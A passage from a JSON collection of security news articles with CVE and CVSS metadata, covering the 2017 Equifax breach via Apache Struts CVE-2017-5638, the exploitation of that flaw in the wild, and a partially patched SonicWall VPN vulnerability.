additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[![equifax-apache-struts](https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png)](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:55", "description": "[![sonicwall vpn vulnerability](https://thehackernews.com/images/-SD858Cx0SIo/YNK2gCP0mWI/AAAAAAAAC9U/CUkLKG6oVs8GdJbW6x6S3s1PA6DZGLEFwCLcBGAsYHQ/s728-e1000/sonicwall-vpn-hacking.jpg)](<https://thehackernews.com/images/-SD858Cx0SIo/YNK2gCP0mWI/AAAAAAAAC9U/CUkLKG6oVs8GdJbW6x6S3s1PA6DZGLEFwCLcBGAsYHQ/s0/sonicwall-vpn-hacking.jpg>)\n\nA critical vulnerability in SonicWall VPN appliances that was believed to have been patched last year has been now found to be \"botched,\" with the company leaving a memory leak flaw unaddressed, until now, that could permit a remote attacker to gain access to sensitive information.\n\nThe shortcoming was rectified in an update rolled out to SonicOS on June 22. \n\nTracked as [CVE-2021-20019](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006>) (CVSS score: 5.3), the vulnerability is the consequence of a memory leak when sending a specially-crafted unauthenticated HTTP request, culminating in information disclosure.\n\nIt's worth noting that SonicWall's decision to hold back the patch comes amid [multiple](<https://thehackernews.com/2021/02/hackers-exploiting-critical-zero-day.html>) [zero-day](<https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html>) [disclosures](<https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html>) affecting its remote access VPN and email security products that have been exploited in a series of in-the-wild attacks to deploy backdoors and a new strain of ransomware called FIVEHANDS.\n\nHowevere, there is no evidence that the flaw is being exploited in the wild.\n\n[![](https://thehackernews.com/images/-m0gO5jwXUhQ/YNLCVzXwu3I/AAAAAAAAC9c/uxaOtb-jqc4cX5OSKdFx5YV65cl6P_KwQCLcBGAsYHQ/s0/memory-dump.jpg)](<https://thehackernews.com/images/-m0gO5jwXUhQ/YNLCVzXwu3I/AAAAAAAAC9c/uxaOtb-jqc4cX5OSKdFx5YV65cl6P_KwQCLcBGAsYHQ/s0/memory-dump.jpg>) \n--- \nMemory Dump PoC \n \n\"SonicWall physical and virtual firewalls running certain versions of SonicOS may contain a vulnerability where the HTTP server response leaks partial memory,\" SonicWall said in an [advisory](<https://www.sonicwall.com/support/product-notification/?sol_id=210621114540820>) published Tuesday. \"This can potentially lead to an internal sensitive data disclosure vulnerability.\"\n\nThe original flaw, identified as [CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) (CVSS score: 9.4), concerned a buffer overflow vulnerability in SonicOS that could allow a remote attacker to cause denial-of-service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall.\n\nWhile SonicWall rolled out a patch in October 2020, additional testing undertaken by cybersecurity firm Tripwire revealed a memory leak as a \"result of an improper fix for CVE-2020-5135,\" according to security researcher Craig Young, who reported the new issue to SonicWall on October 6, 2020.\n\n\"As a one- or two-line fix with minimal impact, I had expected that a patch would probably come out quickly but, fast-forward to March and I still had not heard back,\" Young [noted](<https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/>) in a write-up on Tuesday. \"I reconnected with their PSIRT on March 1, 2021 for an update, but ultimately it took until well into June before an advisory could be released.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T05:11:00", "type": "thn", "title": "SonicWall Left a VPN Flaw Partially Unpatched Amidst 0-Day Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135", "CVE-2021-20019"], "modified": "2021-06-23T05:35:59", "id": "THN:D6FED8C7635FDB50C271368C9373B439", "href": "https://thehackernews.com/2021/06/sonicwall-left-vpn-flaw-partially.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[![Equifax FTC](https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary-300x188.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to 